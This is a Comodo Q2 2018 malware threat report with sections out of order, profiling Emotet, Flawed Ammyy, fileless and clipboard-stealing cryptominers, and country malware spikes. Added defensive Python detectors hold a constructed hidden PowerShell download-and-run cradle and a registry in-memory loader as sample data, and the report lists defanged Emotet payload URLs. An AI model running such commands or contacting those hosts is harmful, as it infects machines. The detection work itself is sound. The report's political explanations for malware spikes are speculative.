5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical Analysis

In this section, let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today, the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking (commonly called cyber espionage), which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals to hunt for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


2.2 PowerShell-based attack with Emotet

Another alarming trend is related to malware itself rather than its delivery method. Often cybercriminals use malware based not on Windows native exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.

Emotet is one of the most aggressive trojans currently acting in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.

The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice the message is written in a cheerful manner to inspire user trust.

The phishing email


The attached file is an Office document containing a VBScript. As the settings of a newly installed Microsoft Office do not allow execution of such scripts by default, the attackers added a special option to convince the victims to turn on VBScript execution.

The special option to convince the victims to turn on VBScript execution


The purpose of the VBScript is to launch PowerShell.


The malware downloads itself to a temporary folder and executes binaries located at hxxp://www.iyilikleralemi.com/GtXvlc, hxxp://www.thecyberconxion.com/PUqUUe, hxxp://EliasWessel.com/vu6xGmS, hxxp://mossbeachmusic.de/XuBBN6r and hxxp://airmaxx.rs/wIdY.

At the time of writing, only the thecyberconxion.com host was serving a malware binary (SHA1: 5974190561e707f63d776e55336841bd871eebdb).

The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service "lanesviewer" to ensure persistence.

The malware creates the "lanesviewer" service to ensure persistence


And after that, Emotet begins its real mission – stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.

The next example is even more cunning because it infects computers using popular, legitimate Microsoft software.

2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on a legitimate software product called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief.

Ammyy Admin is Remote Desktop Software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.


As you can see in the diagram, Ammyy Admin was used in spreading many types of nefarious malware.

The newest version of the malicious modification of Ammyy Admin is called Flawed Ammyy. It's a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as Remote Desktop control, File System Manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok – steal credentials and documents, remove or add files, run applications, install other malware, etc.

The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is the fact that these tricks are also based on using legitimate software – Microsoft's, this time.


Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are intended for making an Internet query from MS Excel, so an IQY file contains a URL and other related parameters. It can download files and run them directly in MS Excel.

The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.
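Because an IQY attachment is plain text that names the URL Excel will fetch, a mail gateway can parse it before delivery. The following is an added example, not Comodo's code; the two sample files, the allowlisted host and the 203.0.113.0/24 documentation address are constructed for illustration.

```python
"""Pre-delivery check for Excel web query (.iqy) attachments.

Added example, not Comodo's code. An IQY file is a tiny text file: a WEB
header line, a version line, the URL Excel will fetch, then key=value
settings. A mail gateway can parse it and refuse attachments whose URL
points outside an allowlist, as in the Flawed Ammyy campaign above.
The two samples and the allowlist are constructed for illustration.
"""
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"intranet.example.com"}  # hypothetical corporate allowlist

# Constructed sample modelled on a malicious attachment: a raw-IP, cleartext
# URL (203.0.113.0/24 is a documentation range) with redirections enabled.
MALICIOUS_IQY = """WEB
1
http://203.0.113.10/2.dat

Selection=AllTables
Formatting=None
PreFormattedTextToColumns=True
ConsecutiveDelimitersAsOne=True
SingleBlockTextImport=False
DisableDateRecognition=False
DisableRedirections=False
"""

# Constructed benign sample: HTTPS, allowlisted host, redirections off.
BENIGN_IQY = """WEB
1
https://intranet.example.com/reports/sales.iqy

Selection=AllTables
Formatting=None
DisableRedirections=True
"""


class IqyError(ValueError):
    """Raised when the text is not an Excel web query."""


def parse_iqy(text: str) -> dict:
    """Split an IQY file into its version, target URL and settings."""
    lines = [ln.strip() for ln in text.splitlines()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise IqyError("missing WEB header; not an Excel web query")
    settings = {}
    for ln in lines[3:]:  # line 4 is the (usually empty) POST data line
        if "=" in ln:
            key, value = ln.split("=", 1)
            settings[key.strip()] = value.strip()
    return {"version": lines[1], "url": lines[2], "settings": settings}


def assess_iqy(text: str) -> dict:
    """Decide allow/block and explain why, from the parsed query alone."""
    query = parse_iqy(text)
    url = urlparse(query["url"])
    host = (url.hostname or "").lower()
    reasons = []
    if url.scheme != "https":
        reasons.append("non-HTTPS scheme: %s" % (url.scheme or "none"))
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
        reasons.append("raw IP address as host")
    if host not in ALLOWED_HOSTS:
        reasons.append("host not allowlisted: %s" % host)
    if query["settings"].get("DisableRedirections", "False").lower() != "true":
        reasons.append("redirections enabled; content may come from another host")
    # Any of the first three is a hard block; redirections alone is advisory.
    blocking = [r for r in reasons if not r.startswith("redirections")]
    verdict = "block" if blocking else "allow"
    return {"url": query["url"], "verdict": verdict, "reasons": reasons}


if __name__ == "__main__":
    for sample in (MALICIOUS_IQY, BENIGN_IQY):
        print(assess_iqy(sample))
```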

Malware runs PowerShell


Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.

2.4 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.

Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases, attacks can only be discovered too late: after money is withdrawn from a bank account, confidential data is published, etc. The merging of trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.

To fight these attacks, cybersecurity departments need to rearrange their approach to security measures according to the new trends above. Combining the best malware detection tools and methods of protecting data, built on defense-in-depth principles, provides the most promising solution.

[Chart residue: The growth of Flawed Ammyy attacks for Q2; bar labels 43188, 46382 and 48881 over Apr, May, Jun; y-axis 40000 to 50000]


3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean that their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new, dangerous abilities.

Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed.

New samples of cryptominers detected by Comodo malware analysts exhibit much more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware represents malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.


Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. In the screenshots below you can see exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
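Both chains on this page end in an encoded PowerShell command line: the Emotet document in 2.2 has a script host launch a hidden download-and-run cradle, and BadShell has a scheduled task launch PowerShell that reads its payload from the registry and loads it in memory. The following added example (not Comodo's code) decodes `-EncodedCommand` arguments from process-creation telemetry and classifies them on exactly those two patterns; the events, the registry key name and the parent-process list are constructed, and the one URL used is the thecyberconxion.com address quoted above, defanged.

```python
"""Triage of encoded PowerShell command lines from process-creation telemetry.

Added example, not Comodo's code. It decodes -EncodedCommand payloads and
flags the two chains the report describes: a script host spawning a hidden
PowerShell download cradle (Emotet, section 2.2) and a Task Scheduler-launched
PowerShell that pulls its payload from the registry and loads it in memory
(BadShell, section 3.1). All events below are constructed for illustration.
"""
import base64
import re


def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed process-creation records shaped like Sysmon event 1 / EDR data.
SAMPLE_EVENTS = [
    {   # VBScript host launching a download-and-run cradle (Emotet-style)
        "parent": r"C:\Windows\System32\wscript.exe",
        "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc " + encode_ps(
            "(New-Object Net.WebClient).DownloadFile("
            "'hxxp://www.thecyberconxion.com/PUqUUe', $env:TEMP+'\\x.exe');"
            "Start-Process ($env:TEMP+'\\x.exe')"),
    },
    {   # Task Scheduler host launching a registry-resident loader (BadShell-style)
        "parent": r"C:\Windows\System32\svchost.exe",
        "cmdline": "powershell.exe -NonInteractive -WindowStyle Hidden -EncodedCommand "
        + encode_ps(
            "$p=(Get-ItemProperty HKLM:\\SOFTWARE\\Example).Payload;"  # hypothetical key
            "$b=[Convert]::FromBase64String($p);"
            "[Reflection.Assembly]::Load($b)"),
    },
    {   # Benign administrative script, no encoding
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1",
    },
]

# Accepts the abbreviations PowerShell resolves to -EncodedCommand.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SCRIPT_PARENTS = ("winword.exe", "excel.exe", "wscript.exe", "cscript.exe", "mshta.exe")

INDICATORS = {
    "download_cradle": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b", re.I),
    "registry_payload": re.compile(r"Get-ItemProperty\s+HK(?:LM|CU):", re.I),
    "in_memory_load": re.compile(r"FromBase64String|Reflection\.Assembly|VirtualAlloc|\biex\b", re.I),
}


def decode_encoded_command(cmdline: str):
    """Return the decoded script, or None if no -EncodedCommand is present."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""  # present but undecodable: still worth a look


def triage(event: dict):
    """Classify one process-creation event; None when it carries no encoded command."""
    script = decode_encoded_command(event["cmdline"])
    if script is None:
        return None
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if parent in SCRIPT_PARENTS:
        hits.append("script_or_office_parent")
    if "registry_payload" in hits and "in_memory_load" in hits:
        verdict = "badshell-like fileless loader"
    elif "download_cradle" in hits and "script_or_office_parent" in hits:
        verdict = "emotet-like dropper chain"
    elif hits:
        verdict = "suspicious encoded powershell"
    else:
        verdict = "encoded powershell (manual review)"
    return {"verdict": verdict, "indicators": hits, "decoded": script}


def triage_all(events):
    """Return one result per event that carried an encoded command."""
    return [r for r in (triage(e) for e in events) if r is not None]


if __name__ == "__main__":
    for r in triage_all(SAMPLE_EVENTS):
        print(r["verdict"], r["indicators"])
```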

BadShell at work


The malicious code in the registry


This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.

Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature – it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task – mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature will terminate its processes.

CoinMiner kills its rivals as follows.

The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.

In this way, CoinMiner undividedly occupies the victim's computer to use its resources for mining cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, easing user detection. In Q2, these cryptominers learned to hide. CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users have started checking websites' code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.


As a result, the malicious code on a webpage looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe:

The iframe loads the URL shortener

Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we can find the familiar link to CoinHive:

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
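A page check that follows the same steps the analysis above took by hand, decoding the string literal and then looking at the iframe's size and destination, catches this disguise. The following is an added example, not Comodo's code; the sample pages are constructed, the short-link code in them is a placeholder, and cnhv.co is the CoinHive short-link host quoted above.

```python
"""Scan a web page for CoinHive loaded through a hidden iframe.

Added example, not Comodo's code. It peels the encoding layers the report
describes (a document.write(unescape(...)) or atob(...) string literal),
then inspects every iframe for the two tells: a 1x1 size and a src on the
CoinHive short-link domain cnhv.co. The sample pages are constructed; the
short-link code in them is a placeholder, not a real link.
"""
import base64
import re
from urllib.parse import quote, unquote, urlparse

SHORTENER_HOSTS = {"cnhv.co"}  # CoinHive's short-link domain shown in the report

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*["']?([^"'\s>]+)""")
UNESCAPE_RE = re.compile(r"""unescape\(\s*["']([^"']+)["']\s*\)""", re.I)
ATOB_RE = re.compile(r"""atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""", re.I)

# Constructed pages: one ordinary embed plus the obfuscated miner iframe,
# once percent-encoded (unescape) and once base64-encoded (atob).
HIDDEN_IFRAME = '<iframe src="https://cnhv.co/PLACEHOLDER" width="1" height="1"></iframe>'
SAMPLE_PAGE = (
    "<html><body>\n"
    '<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>\n'
    "<script>document.write(unescape('" + quote(HIDDEN_IFRAME, safe="") + "'))</script>\n"
    "</body></html>"
)
SAMPLE_PAGE_ATOB = (
    "<html><body><script>document.write(atob('"
    + base64.b64encode(HIDDEN_IFRAME.encode("utf-8")).decode("ascii")
    + "'))</script></body></html>"
)


def decode_layers(html: str) -> list:
    """Return the page text plus every decodable string literal found in it."""
    layers = [html]
    for m in UNESCAPE_RE.finditer(html):
        layers.append(unquote(m.group(1)))
    for m in ATOB_RE.finditer(html):
        try:
            layers.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
        except ValueError:
            continue
    return layers


def _px(value: str):
    """Parse a width/height attribute; None when absent or not numeric."""
    try:
        return int(value.lower().rstrip("px"))
    except ValueError:
        return None


def find_hidden_iframes(html: str) -> list:
    """List iframes that are effectively invisible or point at the miner short link."""
    findings = []
    for layer in decode_layers(html):
        for tag in IFRAME_RE.finditer(layer):
            attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag.group(0))}
            src = attrs.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            width, height = _px(attrs.get("width", "")), _px(attrs.get("height", ""))
            reasons = []
            if host in SHORTENER_HOSTS:
                reasons.append("src points at CoinHive short-link host %s" % host)
            if width is not None and height is not None and width <= 1 and height <= 1:
                reasons.append("1x1 iframe, effectively invisible")
            if reasons:
                findings.append({"src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for page in (SAMPLE_PAGE, SAMPLE_PAGE_ATOB):
        print(find_hidden_iframes(page))
```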

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string combining different characters and numbers, so it is almost impossible to remember it or fill it in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it changes it to the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

